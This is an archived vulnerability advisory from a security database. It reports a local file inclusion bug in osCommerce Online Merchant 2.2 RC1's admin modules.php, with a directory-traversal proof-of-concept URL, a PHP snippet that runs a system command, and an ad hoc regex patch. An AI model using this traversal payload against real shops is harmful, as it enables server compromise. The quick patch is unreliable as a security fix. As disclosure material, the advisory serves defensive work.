Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:17488
HistoryJul 13, 2007 - 12:00 a.m.

osCommerce Online Merchant v2.2 RC1 local include bug

2007-07-1300:00:00
vulners.com
43
JSON

osCommerce Online Merchant v2.2 RC1 local include bug

SEVERITY:

Normal

SOFTWARE:

osCommerce Online Merchant v2.2 RC1

http://oscommerce.com/

INFO:

osCommerce is an Open Source based online shop e-commerce solution that is available for free under
the GNU General Public License

DESCRIPTION:

osCommerce has a local inclusion bug in the modules.php file:

http://127.0.0.1/oscommerce-2.2rc1/catalog/admin/modules.php?module_directory=../../../&file=test.php

Where test.php contains:

<?php
system("dir");
?>

VENDOR STATUS:

Vendor was contacted but no response received till date.

MY FIX:

Put:

if(preg_match("/\.\./i", $module_directory)){echo "HACKING attempt !";exit(0);}
$module_directory = preg_replace("/[\/]/i","(/)",$module_directory);
$module_directory = ereg_replace("[\*]","(\)",$module_directory);

Before:

include(DIR_FS_CATALOG_LANGUAGES . $language . '/modules/' . $module_type . '/' . $file);
include($module_directory . $file);

This vulnerability was discovered by matrix_killer

mail : matrix_k at abv.bg

Greets: EcLiPsE, Bl0od3r and Acid_BDS

С бензин в кръвта!
http://auto-motor-und-sport.bg/

JSON